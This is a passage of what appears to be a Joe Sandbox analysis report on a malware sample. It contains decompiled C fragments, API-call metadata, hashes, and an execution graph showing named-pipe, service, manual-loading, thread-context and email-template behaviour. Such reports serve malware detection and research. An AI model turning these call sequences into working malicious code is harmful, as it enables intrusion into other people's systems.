                                                                                                                                  • InterlockedIncrement.KERNEL32(00413640), ref: 0040ABE1
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: IncrementInterlockedlstrcpyn
                                                                                                                                  • String ID: %FROM_EMAIL
                                                                                                                                  • API String ID: 224340156-2903620461
                                                                                                                                  • Opcode ID: 85a21fda7c2203b6c3b9fe5e6af0625d6c65905c1dc9d9bdca14f106badbca83
                                                                                                                                  • Instruction ID: 7c747491fd5973eaabf4003e0d871bd0eed893c7530145efd7f06e2bf3dfd35d
                                                                                                                                  • Opcode Fuzzy Hash: 85a21fda7c2203b6c3b9fe5e6af0625d6c65905c1dc9d9bdca14f106badbca83
                                                                                                                                  • Instruction Fuzzy Hash: D3019231508384AFDB21CF18D881F967FA5AF15314F1444A6F6805B393C3B9E995CB96
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • gethostbyaddr.WS2_32(00000000,00000004,00000002), ref: 004026C3
                                                                                                                                  • inet_ntoa.WS2_32(?), ref: 004026E4
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: gethostbyaddrinet_ntoa
                                                                                                                                  • String ID: localcfg
                                                                                                                                  • API String ID: 2112563974-1857712256
                                                                                                                                  • Opcode ID: d53564beee30921141880bc566d8d3609085812ca2ea79526dfe3cb7d65e7849
                                                                                                                                  • Instruction ID: d2c247fa2f64166219b22d1ecfca1b9a377bc480b126e4bf322f1ec8134a793b
                                                                                                                                  • Opcode Fuzzy Hash: d53564beee30921141880bc566d8d3609085812ca2ea79526dfe3cb7d65e7849
                                                                                                                                  • Instruction Fuzzy Hash: 81F082321482097BEF006FA1ED09A9A379CEF09354F108876FA08EA0D0DBB5D950979C
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: gethostbynameinet_addr
                                                                                                                                  • String ID: time_cfg
                                                                                                                                  • API String ID: 1594361348-2401304539
                                                                                                                                  • Opcode ID: f9db606e706a3ea9b2ac4bed422f000f2ba59a3d29e70a13aafe2ea60d03e68c
                                                                                                                                  • Instruction ID: 506fadec158220b53989f58c32679351ed61dc8f5455c60e8cf87b9af1828998
                                                                                                                                  • Opcode Fuzzy Hash: f9db606e706a3ea9b2ac4bed422f000f2ba59a3d29e70a13aafe2ea60d03e68c
                                                                                                                                  • Instruction Fuzzy Hash: 9CE08C302040219FCB108B28F848AC637A4AF06330F0189A2F840E32E0C7B89CC08688
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
			// Lazy resolver for ntdll exports: caches the ntdll.dll module handle in the
			// global at 0x4136f4 and returns GetProcAddress(ntdll, _a4) for the requested name.
			E0040EAE4(CHAR* _a4) {
				struct HINSTANCE__* _t2;

				_t2 =  *0x4136f4;
				if(_t2 != 0) {
					L3:
					return GetProcAddress(_t2, _a4);
				} else {
					// First call: load ntdll.dll and cache the handle for later lookups.
					_t2 = LoadLibraryA("ntdll.dll");
					 *0x4136f4 = _t2;
					if(_t2 != 0) {
						goto L3;
					} else {
						// LoadLibraryA failed; NULL is returned to the caller.
						return _t2;
					}
				}
			}




                                                                                                                                  0x0040eae4
                                                                                                                                  0x0040eaeb
                                                                                                                                  0x0040eb02
                                                                                                                                  0x0040eb0d
                                                                                                                                  0x0040eaed
                                                                                                                                  0x0040eaf2
                                                                                                                                  0x0040eaf8
                                                                                                                                  0x0040eaff
                                                                                                                                  0x00000000
                                                                                                                                  0x0040eb01
                                                                                                                                  0x0040eb01
                                                                                                                                  0x0040eb01
                                                                                                                                  0x0040eaff

                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryA.KERNEL32(ntdll.dll,0040EB54,_alldiv,0040F0B7,80000001,00000000,00989680,00000000,?,?,?,0040E342,00000000,745CF210,80000001,00000000), ref: 0040EAF2
                                                                                                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 0040EB07
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                  • String ID: ntdll.dll
                                                                                                                                  • API String ID: 2574300362-2227199552
                                                                                                                                  • Opcode ID: b4eb004c93ce830f66033c1bec013b2cb76b73adf8dbcf645c2d99c100687d31
                                                                                                                                  • Instruction ID: 7b5812d5d2c037db56fb7cc720bc5ad28be2e092f3141d28ea6626f847aa1f88
                                                                                                                                  • Opcode Fuzzy Hash: b4eb004c93ce830f66033c1bec013b2cb76b73adf8dbcf645c2d99c100687d31
                                                                                                                                  • Instruction Fuzzy Hash: D0D0C934600302ABCF22CF65AE1EA867AACAB54702B40C436B406E1670E778E994DA0C
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E00402F22(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                                                                                                                  				signed int _v8;
                                                                                                                                  				void* _v12;
                                                                                                                                  				char _v368;
                                                                                                                                  				void* _t64;
                                                                                                                                  				signed short* _t66;
                                                                                                                                  				intOrPtr* _t67;
                                                                                                                                  				intOrPtr* _t72;
                                                                                                                                  				intOrPtr* _t76;
                                                                                                                                  				intOrPtr* _t82;
                                                                                                                                  				short _t86;
                                                                                                                                  				intOrPtr* _t87;
                                                                                                                                  				signed int _t94;
                                                                                                                                  				intOrPtr _t96;
                                                                                                                                  				signed int _t99;
                                                                                                                                  				short* _t100;
                                                                                                                                  				void* _t101;
                                                                                                                                  				void* _t102;
                                                                                                                                  				void* _t103;
                                                                                                                                  				intOrPtr _t109;
                                                                                                                                  				intOrPtr _t110;
                                                                                                                                  				intOrPtr _t111;
                                                                                                                                  				intOrPtr _t114;
                                                                                                                                  				void* _t115;
                                                                                                                                  				intOrPtr* _t116;
                                                                                                                                  				void* _t117;
                                                                                                                                  				signed int _t118;
                                                                                                                                  				void* _t121;
                                                                                                                                  				void* _t122;
                                                                                                                                  				void* _t123;
                                                                                                                                  				void* _t124;
                                                                                                                                  
                                                                                                                                  				_t116 = _a12;
                                                                                                                                  				_t94 = 0;
                                                                                                                                  				 *_t116 = 0;
                                                                                                                                  				_t117 = E00402D21(_a4);
                                                                                                                                  				if(_t117 != 0) {
                                                                                                                                  					if( *_t117 != 0) {
                                                                                                                                  						_v12 = _t117;
                                                                                                                                  						_a12 = _a8;
                                                                                                                                  						while(_t94 < 5) {
                                                                                                                                  							_t9 = _t117 + 8; // 0x8
                                                                                                                                  							_t104 = _t9;
                                                                                                                                  							_t82 = _t9;
                                                                                                                                  							_t10 = _t82 + 1; // 0x9
                                                                                                                                  							_v8 = _t10;
                                                                                                                                  							do {
                                                                                                                                  								_t114 =  *_t82;
                                                                                                                                  								_t82 = _t82 + 1;
                                                                                                                                  							} while (_t114 != 0);
                                                                                                                                  							E0040EE08(_a12, _t104, _t82 - _v8 + 1);
                                                                                                                                  							_t86 =  *((intOrPtr*)(_t117 + 4));
                                                                                                                                  							_a12 = _a12 + 0x100;
                                                                                                                                  							_t122 = _t122 + 0xc;
                                                                                                                                  							 *_t116 =  *_t116 + 1;
                                                                                                                                  							_t117 =  *_t117;
                                                                                                                                  							 *((short*)(_t121 + _t94 * 2 - 0x6c)) = _t86;
                                                                                                                                  							_t94 = _t94 + 1;
                                                                                                                                  							if(_t117 != 0) {
                                                                                                                                  								continue;
                                                                                                                                  							}
                                                                                                                                  							break;
                                                                                                                                  						}
                                                                                                                                  						HeapFree(GetProcessHeap(), 0, _v12);
                                                                                                                                  						_v8 = _v8 & 0x00000000;
                                                                                                                                  						if( *_t116 == 1) {
                                                                                                                                  							L24:
                                                                                                                                  							return 1;
                                                                                                                                  						}
                                                                                                                                  						_t64 =  *_t116 - 1;
                                                                                                                                  						_a12 = _a8;
                                                                                                                                  						do {
                                                                                                                                  							_t118 = _v8;
                                                                                                                                  							_t99 = _t118;
                                                                                                                                  							if(_t118 >=  *_t116 - 1) {
                                                                                                                                  								L17:
                                                                                                                                  								_t66 = _t121 + _v8 * 2 - 0x6c;
                                                                                                                                  								_t100 = _t121 + _t118 * 2 - 0x6c;
                                                                                                                                  								 *_t66 =  *_t100;
                                                                                                                                  								_t67 = _a12;
                                                                                                                                  								 *_t100 =  *_t66 & 0x0000ffff;
                                                                                                                                  								_t101 = _t67 + 1;
                                                                                                                                  								do {
                                                                                                                                  									_t109 =  *_t67;
                                                                                                                                  									_t67 = _t67 + 1;
                                                                                                                                  								} while (_t109 != 0);
                                                                                                                                  								E0040EE08( &_v368, _a12, _t67 - _t101 + 1);
                                                                                                                                  								_t123 = _t122 + 0xc;
                                                                                                                                  								_t120 = (_t118 << 8) + _a8;
                                                                                                                                  								_t72 = (_t118 << 8) + _a8;
                                                                                                                                  								_t102 = _t72 + 1;
                                                                                                                                  								do {
                                                                                                                                  									_t110 =  *_t72;
                                                                                                                                  									_t72 = _t72 + 1;
                                                                                                                                  								} while (_t110 != 0);
                                                                                                                                  								E0040EE08(_a12, _t120, _t72 - _t102 + 1);
                                                                                                                                  								_t76 =  &_v368;
                                                                                                                                  								_t124 = _t123 + 0xc;
                                                                                                                                  								_t103 = _t76 + 1;
                                                                                                                                  								do {
                                                                                                                                  									_t111 =  *_t76;
                                                                                                                                  									_t76 = _t76 + 1;
                                                                                                                                  								} while (_t111 != 0);
                                                                                                                                  								goto L23;
                                                                                                                                  							} else {
                                                                                                                                  								goto L14;
                                                                                                                                  							}
                                                                                                                                  							do {
                                                                                                                                  								L14:
                                                                                                                                  								if( *((intOrPtr*)(_t121 + _t99 * 2 - 0x6a)) <  *((intOrPtr*)(_t121 + _t99 * 2 - 0x6c))) {
                                                                                                                                  									_t32 = _t99 + 1; // 0x1
                                                                                                                                  									_t118 = _t32;
                                                                                                                                  								}
                                                                                                                                  								_t99 = _t99 + 1;
                                                                                                                                  							} while (_t99 < _t64);
                                                                                                                                  							goto L17;
                                                                                                                                  							L23:
                                                                                                                                  							E0040EE08(_t120,  &_v368, _t76 - _t103 + 1);
                                                                                                                                  							_a12 = _a12 + 0x100;
                                                                                                                                  							_t122 = _t124 + 0xc;
                                                                                                                                  							_v8 = _v8 + 1;
                                                                                                                                  							_t64 =  *_t116 - 1;
                                                                                                                                  						} while (_v8 < _t64);
                                                                                                                                  						goto L24;
                                                                                                                                  					}
                                                                                                                                  					_t3 = _t117 + 8; // 0x8
                                                                                                                                  					_t105 = _t3;
                                                                                                                                  					_t87 = _t3;
                                                                                                                                  					_t4 = _t87 + 1; // 0x9
                                                                                                                                  					_t115 = _t4;
                                                                                                                                  					do {
                                                                                                                                  						_t96 =  *_t87;
                                                                                                                                  						_t87 = _t87 + 1;
                                                                                                                                  					} while (_t96 != 0);
                                                                                                                                  					E0040EE08(_a8, _t105, _t87 - _t115 + 1);
                                                                                                                                  					 *_t116 =  *_t116 + 1;
                                                                                                                                  					HeapFree(GetProcessHeap(), 0, _t117);
                                                                                                                                  					goto L24;
                                                                                                                                  				}
                                                                                                                                  				return 0;
                                                                                                                                  			}
                                                                                                                                   Instruction addresses (the listing's per-statement address column, detached from the C-code by extraction; 0x00000000 marks statements with no address):
                                                                                                                                   0x00402f2e 0x00402f34 0x00402f36 0x00402f3d 0x00402f42 0x00402f4d 0x00402f88 0x00402f8b
                                                                                                                                   0x00402f8e 0x00402f93 0x00402f93 0x00402f96 0x00402f98 0x00402f9b 0x00402f9e 0x00402f9e
                                                                                                                                   0x00402fa0 0x00402fa1 0x00402fae 0x00402fb3 0x00402fb7 0x00402fbe 0x00402fc1 0x00402fc3
                                                                                                                                   0x00402fc5 0x00402fca 0x00402fcd 0x00000000 0x00000000 0x00000000 0x00402fcd 0x00402fdb
                                                                                                                                   0x00402fe3 0x00402fe8 0x004030ad 0x00000000 0x004030af 0x00402ff3 0x00402ff4 0x00402ff7
                                                                                                                                   0x00402ff9 0x00402ffd 0x00403001 0x00403017 0x0040301a 0x00403021 0x00403028 0x0040302b
                                                                                                                                   0x0040302e 0x00403031 0x00403034 0x00403034 0x00403036 0x00403037 0x00403049 0x00403051
                                                                                                                                   0x00403054 0x00403057 0x00403059 0x0040305c 0x0040305c 0x0040305e 0x0040305f 0x0040306b
                                                                                                                                   0x00403070 0x00403076 0x00403079 0x0040307c 0x0040307c 0x0040307e 0x0040307f 0x00000000
                                                                                                                                   0x00000000 0x00000000 0x00000000 0x00403003 0x00403003 0x0040300d 0x0040300f 0x0040300f
                                                                                                                                   0x0040300f 0x00403012 0x00403013 0x00000000 0x00403083 0x0040308f 0x00403094 0x0040309d
                                                                                                                                  0x004030a0
                                                                                                                                  0x004030a3
                                                                                                                                  0x004030a4
                                                                                                                                  0x00000000
                                                                                                                                  0x00402ff7
                                                                                                                                  0x00402f4f
                                                                                                                                  0x00402f4f
                                                                                                                                  0x00402f52
                                                                                                                                  0x00402f54
                                                                                                                                  0x00402f54
                                                                                                                                  0x00402f57
                                                                                                                                  0x00402f57
                                                                                                                                  0x00402f59
                                                                                                                                  0x00402f5a
                                                                                                                                  0x00402f66
                                                                                                                                  0x00402f6e
                                                                                                                                  0x00402f7a
                                                                                                                                  0x00000000
                                                                                                                                  0x00402f7a
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00402D21: GetModuleHandleA.KERNEL32(00000000,7620EA30,?,00000000,00402F01,?,004020FF,00412000), ref: 00402D3A
                                                                                                                                    • Part of subcall function 00402D21: LoadLibraryA.KERNEL32(?), ref: 00402D4A
                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00402F73
                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 00402F7A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$FreeHandleLibraryLoadModuleProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1017166417-0
                                                                                                                                  • Opcode ID: 3f77e5f90a98cb00e4cd81c42479f24e3707705fbe302646911da8b0c8861fdf
                                                                                                                                  • Instruction ID: 68d3b74a61d8da24685d2c7d21854d87d7e5c343c8b3ec1e3967b08f84d9f298
                                                                                                                                  • Opcode Fuzzy Hash: 3f77e5f90a98cb00e4cd81c42479f24e3707705fbe302646911da8b0c8861fdf
                                                                                                                                  • Instruction Fuzzy Hash: C251E23190020A9FCF01DF64D8889FABB79FF15304F10457AEC95E7290E7769A19CB88
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00AD2F88: GetModuleHandleA.KERNEL32(?), ref: 00AD2FA1
                                                                                                                                    • Part of subcall function 00AD2F88: LoadLibraryA.KERNEL32(?), ref: 00AD2FB1
                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00AD31DA
                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 00AD31E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$FreeHandleLibraryLoadModuleProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1017166417-0
                                                                                                                                  • Opcode ID: 6d22c46e4b2bbf8f956e586da185c112e243b929c4a2d348202b24ffe9e68596
                                                                                                                                  • Instruction ID: 3f2f1d219ee8f0f1ea79fb751f9843a1d4a105f30f86a694267c209b9e64a0ec
                                                                                                                                  • Opcode Fuzzy Hash: 6d22c46e4b2bbf8f956e586da185c112e243b929c4a2d348202b24ffe9e68596
                                                                                                                                  • Instruction Fuzzy Hash: E9518A7290024AAFCF019F64DC889FAB775FF29304B14456AECA697311E7329A19CB91
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Execution Graph

                                                                                                                                  Execution Coverage:2.4%
                                                                                                                                  Dynamic/Decrypted Code Coverage:26.6%
                                                                                                                                  Signature Coverage:0%
                                                                                                                                  Total number of Nodes:1924
                                                                                                                                  Total number of Limit Nodes:18
                                                                                                                                  execution_graph 19685 418140 19686 41817e 19685->19686 19688 418187 7 library calls 19685->19688 19689 417880 19686->19689 19691 417893 __callnewh 19689->19691 19692 4178a8 __callnewh 19689->19692 19691->19692 19693 417910 19691->19693 19692->19688 19694 417921 19693->19694 19695 417972 _V6_HeapAlloc 19694->19695 19696 41795b RtlAllocateHeap 19694->19696 19695->19691 19696->19695 21553 41dac6 21554 41dade __isleadbyte_l 21553->21554 21555 422a30 ___crtLCMapStringA LCMapStringW 21554->21555 21556 41db90 21555->21556 21574 40e749 21575 40dd05 6 API calls 21574->21575 21576 40e751 21575->21576 21577 40e781 lstrcmpA 21576->21577 21578 40e799 21576->21578 21577->21576 20851 40444a 20852 404458 20851->20852 20853 40446a 20852->20853 20855 401940 20852->20855 20856 40ec2e codecvt 4 API calls 20855->20856 20857 401949 20856->20857 20857->20853 21448 405e4d 21449 405048 8 API calls 21448->21449 21450 405e55 21449->21450 21451 405e64 21450->21451 21452 401940 4 API calls 21450->21452 21452->21451 20858 408c51 20859 408c86 20858->20859 20860 408c5d 20858->20860 20861 408c8b lstrcmpA 20859->20861 20871 408c7b 20859->20871 20864 408c7d 20860->20864 20865 408c6e 20860->20865 20862 408c9e 20861->20862 20861->20871 20863 408cad 20862->20863 20866 40ec2e codecvt 4 API calls 20862->20866 20870 40ebcc 4 API calls 20863->20870 20863->20871 20880 408bb3 20864->20880 20872 408be7 20865->20872 20866->20863 20870->20871 20873 408bf2 20872->20873 20874 408c2a 20872->20874 20875 408bb3 6 API calls 20873->20875 20874->20871 20876 408bf8 20875->20876 20884 406410 20876->20884 20878 408c01 20878->20874 20899 406246 20878->20899 20881 408bbc 20880->20881 20882 408be4 20880->20882 20881->20882 20883 406246 6 API calls 20881->20883 20883->20882 20885 406421 20884->20885 20886 40641e 20884->20886 20887 40643a 20885->20887 20888 40643e VirtualAlloc 20885->20888 
20886->20878 20887->20878 20889 406472 20888->20889 20890 40645b VirtualAlloc 20888->20890 20891 40ebcc 4 API calls 20889->20891 20890->20889 20898 4064fb 20890->20898 20892 406479 20891->20892 20892->20898 20909 406069 20892->20909 20895 4064da 20897 406246 6 API calls 20895->20897 20895->20898 20897->20898 20898->20878 20900 406252 20899->20900 20908 4062b3 20899->20908 20901 40628f 20900->20901 20904 406281 FreeLibrary 20900->20904 20907 406297 20900->20907 20905 40ec2e codecvt 4 API calls 20901->20905 20902 4062a0 VirtualFree 20903 4062ad 20902->20903 20906 40ec2e codecvt 4 API calls 20903->20906 20904->20900 20905->20907 20906->20908 20907->20902 20907->20903 20908->20874 20910 406090 IsBadReadPtr 20909->20910 20912 406089 20909->20912 20910->20912 20916 4060aa 20910->20916 20911 4060c0 LoadLibraryA 20911->20912 20911->20916 20912->20895 20919 405f3f 20912->20919 20913 40ebcc 4 API calls 20913->20916 20914 40ebed 8 API calls 20914->20916 20915 406191 IsBadReadPtr 20915->20912 20915->20916 20916->20911 20916->20912 20916->20913 20916->20914 20916->20915 20917 406141 GetProcAddress 20916->20917 20918 406155 GetProcAddress 20916->20918 20917->20916 20918->20916 20920 405fe6 20919->20920 20922 405f61 20919->20922 20920->20895 20921 405fbf VirtualProtect 20921->20920 20921->20922 20922->20920 20922->20921 21396 4179d0 21399 417a10 21396->21399 21402 41bcc0 21399->21402 21401 4179fb 21405 41bce5 7 library calls 21402->21405 21403 41bd95 __itow_s __VCrtDbgReportA __VCrtDbgReportW 21403->21401 21405->21403 21406 417a40 21405->21406 21407 417a4f __snwprintf_s _memcpy_s 21406->21407 21409 417a6d 21407->21409 21410 4219d0 21407->21410 21409->21403 21411 416f00 FindHandlerForForeignException RtlEncodePointer 21410->21411 21412 4219e4 21411->21412 21413 421a1d __encode_pointer 21412->21413 21414 416e30 __encode_pointer RtlEncodePointer 21412->21414 21413->21409 21415 421a4c 21414->21415 21416 416e30 __encode_pointer RtlEncodePointer 21415->21416 21417 421a69 21416->21417 
21418 416e30 __encode_pointer RtlEncodePointer 21417->21418 21419 421a86 21418->21419 21420 416e30 __encode_pointer RtlEncodePointer 21419->21420 21421 421aa9 21420->21421 21421->21413 21422 416e30 __encode_pointer RtlEncodePointer 21421->21422 21422->21413 21823 4043d2 21824 4043e0 21823->21824 21825 4043ef 21824->21825 21826 401940 4 API calls 21824->21826 21826->21825 20923 405453 20928 40543a 20923->20928 20931 405048 20928->20931 20936 404bd1 GetTickCount 20931->20936 20934 40508b 20935 40ec2e codecvt 4 API calls 20935->20934 20937 404bff InterlockedExchange 20936->20937 20938 404c08 20937->20938 20939 404bec GetTickCount 20937->20939 20938->20934 20938->20935 20939->20938 20940 404bf7 Sleep 20939->20940 20940->20937 21557 404ed3 21562 404c9a 21557->21562 21563 404cd8 21562->21563 21565 404ca9 21562->21565 21564 40ec2e codecvt 4 API calls 21564->21563 21565->21564 21116 40195b 21117 401971 21116->21117 21118 40196b 21116->21118 21119 40ec2e codecvt 4 API calls 21118->21119 21119->21117 20941 40405e CreateEventA 20942 404084 20941->20942 20943 40407d 20941->20943 20944 403ecd 6 API calls 20942->20944 20945 40408f 20944->20945 20946 404000 3 API calls 20945->20946 20947 404095 20946->20947 20948 404130 20947->20948 20953 403f18 4 API calls 20947->20953 20949 403ecd 6 API calls 20948->20949 20950 404159 CreateNamedPipeA 20949->20950 20951 404167 Sleep 20950->20951 20952 404188 ConnectNamedPipe 20950->20952 20951->20948 20954 404176 CloseHandle 20951->20954 20956 404195 GetLastError 20952->20956 20965 4041ab 20952->20965 20955 4040da 20953->20955 20954->20952 20957 403f8c 4 API calls 20955->20957 20958 40425e DisconnectNamedPipe 20956->20958 20956->20965 20959 4040ec 20957->20959 20958->20952 20960 404127 CloseHandle 20959->20960 20961 404101 20959->20961 20960->20948 20963 403f18 4 API calls 20961->20963 20962 403f18 WriteFile GetLastError WaitForSingleObject GetOverlappedResult 20962->20965 20964 40411c ExitProcess 20963->20964 20965->20952 20965->20958 
20965->20962 20966 403f8c ReadFile GetLastError WaitForSingleObject GetOverlappedResult 20965->20966 20967 40426a CloseHandle CloseHandle 20965->20967 20966->20965 20968 40e318 23 API calls 20967->20968 20969 40427b 20968->20969 20969->20969 21120 404960 21121 40496d 21120->21121 21123 40497d 21120->21123 21122 40ebed 8 API calls 21121->21122 21122->21123 19616 4160e0 19617 4160f1 19616->19617 19620 4160f6 19616->19620 19631 41ad60 19617->19631 19619 41610b 19620->19619 19622 40c125 19620->19622 19635 40ec54 GetSystemTimeAsFileTime GetVolumeInformationA 19622->19635 19624 40c12d 19637 40e654 19624->19637 19626 40c2bd 19627 40e654 13 API calls 19626->19627 19628 40c2c9 19627->19628 19629 40e654 13 API calls 19628->19629 19630 40c2d5 19629->19630 19630->19620 19632 41ad6e 19631->19632 19634 41ad75 19631->19634 19661 41a1c0 19632->19661 19634->19620 19636 40ec7e 19635->19636 19636->19624 19648 40dd05 GetTickCount 19637->19648 19639 40e6a5 19646 40e6f5 19639->19646 19655 40ebcc GetProcessHeap HeapAlloc 19639->19655 19641 40e65f 19641->19639 19642 40e68c lstrcmpA 19641->19642 19642->19641 19643 40e6b0 19644 40e6b7 19643->19644 19645 40e6e0 lstrcpynA 19643->19645 19643->19646 19644->19626 19645->19646 19646->19644 19647 40e71d lstrcmpA 19646->19647 19647->19646 19649 40dd41 InterlockedExchange 19648->19649 19650 40dd20 GetCurrentThreadId 19649->19650 19651 40dd4a 19649->19651 19652 40dd53 GetCurrentThreadId 19650->19652 19653 40dd2e GetTickCount 19650->19653 19651->19652 19652->19641 19653->19651 19654 40dd39 Sleep 19653->19654 19654->19649 19658 40eb74 19655->19658 19659 40eb7b GetProcessHeap HeapSize 19658->19659 19660 40eb93 19658->19660 19659->19660 19660->19643 19662 41a1fe __getptd getSystemCP ___updatetmbcinfo 19661->19662 19664 41a279 __setmbcp 19662->19664 19665 41a570 19662->19665 19664->19634 19667 41a58c getSystemCP 19665->19667 19666 41a598 __setmbcp_nolock 19666->19664 19667->19666 19668 41a707 __setmbcp_nolock 19667->19668 19669 41a5dc __setmbcp_nolock 
19667->19669 19668->19666 19672 41aa20 19668->19672 19670 41aa20 setSBUpLow LCMapStringW 19669->19670 19670->19666 19673 41aa49 ___crtLCMapStringW 19672->19673 19674 41ab9c 19673->19674 19678 422a30 19673->19678 19674->19666 19677 422a30 ___crtLCMapStringA LCMapStringW 19677->19674 19679 422a44 19678->19679 19682 422a90 19679->19682 19681 41ab65 19681->19677 19683 422aa1 LCMapStringW 19682->19683 19684 422abd __freea strncnt __MarkAllocaS ___convertcp ___ansicp 19682->19684 19683->19684 19684->19681 19697 409961 RegisterServiceCtrlHandlerA 19698 40997d 19697->19698 19705 4099cb 19697->19705 19707 409892 19698->19707 19700 40999a 19701 4099ba 19700->19701 19702 409892 SetServiceStatus 19700->19702 19704 409892 SetServiceStatus 19701->19704 19701->19705 19703 4099aa 19702->19703 19703->19701 19710 4098f2 19703->19710 19704->19705 19708 4098c2 SetServiceStatus 19707->19708 19708->19700 19711 4098f6 19710->19711 19713 409904 Sleep 19711->19713 19716 409917 19711->19716 19718 404280 CreateEventA 19711->19718 19713->19711 19714 409915 19713->19714 19714->19716 19715 409947 19715->19701 19716->19715 19745 40977c 19716->19745 19719 4042a5 19718->19719 19720 40429d 19718->19720 19759 403ecd 19719->19759 19720->19711 19722 4042b0 19763 404000 19722->19763 19725 4043c1 FindCloseChangeNotification 19725->19720 19726 4042ce 19769 403f18 WriteFile 19726->19769 19731 4043ba CloseHandle 19731->19725 19732 404318 19733 403f18 4 API calls 19732->19733 19734 404331 19733->19734 19735 403f18 4 API calls 19734->19735 19736 40434a 19735->19736 19737 40ebcc 4 API calls 19736->19737 19738 404350 19737->19738 19739 403f18 4 API calls 19738->19739 19740 404389 19739->19740 19777 40ec2e 19740->19777 19743 403f8c 4 API calls 19744 40439f CloseHandle CloseHandle 19743->19744 19744->19720 19803 40ee2a 19745->19803 19748 4097bb 19748->19715 19749 4097c2 19750 4097d4 GetThreadContext 19749->19750 19751 409801 19750->19751 19752 4097f5 19750->19752 19805 40637c 19751->19805 19753 4097f6 
